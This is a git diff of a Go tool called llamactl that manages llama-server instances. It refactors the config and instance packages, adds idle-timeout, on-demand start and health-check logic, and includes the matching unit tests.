package llamactl_test
package config_test
import (
"llamactl/pkg/config"
"os"
"path/filepath"
"testing"
llamactl "llamactl/pkg"
)
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig should not error with defaults: %v", err)
}
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Server.Port != 8080 {
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
}
homedir, err := os.UserHomeDir()
if err != nil {
t.Fatalf("Failed to get user home directory: %v", err)
}
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
}
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
}
if !cfg.Instances.AutoCreateDirs {
t.Error("Expected default instances auto-create to be true")
}
if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
}
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
@@ -56,7 +67,7 @@ server:
port: 9090
instances:
port_range: [7000, 8000]
log_directory: "/custom/logs"
logs_dir: "/custom/logs"
max_instances: 5
llama_executable: "/usr/bin/llama-server"
default_auto_restart: false
@@ -69,7 +80,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -84,8 +95,8 @@ instances:
if cfg.Instances.PortRange != [2]int{7000, 8000} {
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/custom/logs" {
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/custom/logs" {
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_HOST": "0.0.0.0",
"LLAMACTL_PORT": "3000",
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOG_DIR": "/env/logs",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
defer os.Unsetenv(key)
}
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.PortRange != [2]int{5000, 6000} {
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/env/logs" {
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/env/logs" {
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
@@ -183,7 +194,7 @@ instances:
defer os.Unsetenv("LLAMACTL_HOST")
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -219,7 +230,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
_, err = llamactl.LoadConfig(configFile)
_, err = config.LoadConfig(configFile)
if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML")
}
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := llamactl.ParsePortRange(tt.input)
result := config.ParsePortRange(tt.input)
if result != tt.expected {
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
}
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
testCases := []struct {
envVar string
envValue string
checkFn func(*llamactl.Config) bool
checkFn func(*config.AppConfig) bool
desc string
}{
{
envVar: "LLAMACTL_PORT",
envValue: "invalid-port",
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default",
},
{
envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number",
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default",
},
{
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool",
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default",
},
{
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range",
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default",
},
}
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar)
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -323,7 +334,7 @@ server:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}

View File

@@ -1,27 +1,45 @@
package llamactl
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
@@ -30,9 +48,11 @@ type CreateInstanceOptions struct {
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
@@ -44,6 +64,8 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
@@ -53,11 +75,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
globalSettings *config.InstancesConfig
// Status
Running bool `json:"running"`
@@ -81,6 +103,10 @@ type Instance struct {
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
@@ -115,13 +141,27 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
@@ -140,36 +180,44 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Instance{
return &Process{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -187,8 +235,13 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -225,7 +278,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
@@ -235,22 +288,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
Created: i.Created,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
@@ -260,6 +316,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
i.Created = temp.Created
// Handle options with validation but no defaults
if temp.Options != nil {

View File

@@ -0,0 +1,322 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.Running {
t.Error("Expected running to be true")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}

View File

@@ -1,9 +1,10 @@
package llamactl
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
@@ -11,7 +12,7 @@ import (
)
// Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error {
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
@@ -30,6 +31,9 @@ func (i *Instance) Start() error {
i.restarts = 0
}
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
@@ -75,7 +79,7 @@ func (i *Instance) Start() error {
}
// Stop terminates the subprocess
func (i *Instance) Stop() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
@@ -140,7 +144,75 @@ func (i *Instance) Stop() error {
return nil
}
func (i *Instance) monitorProcess() {
func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
host := opts.Host
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
@@ -181,7 +253,7 @@ func (i *Instance) monitorProcess() {
}
// handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() {
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
@@ -223,7 +295,7 @@ func (i *Instance) handleRestart() {
}
// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0

View File

@@ -1,4 +1,4 @@
package llamactl
package instance
import (
"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()

View File

@@ -1,6 +1,6 @@
//go:build !windows
package llamactl
package instance
import (
"os/exec"

View File

@@ -1,6 +1,6 @@
//go:build windows
package llamactl
package instance
import "os/exec"

28
pkg/instance/timeout.go Normal file
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}

View File

@@ -0,0 +1,195 @@
package instance_test
import (
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Simulate running state
inst.Running = true
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
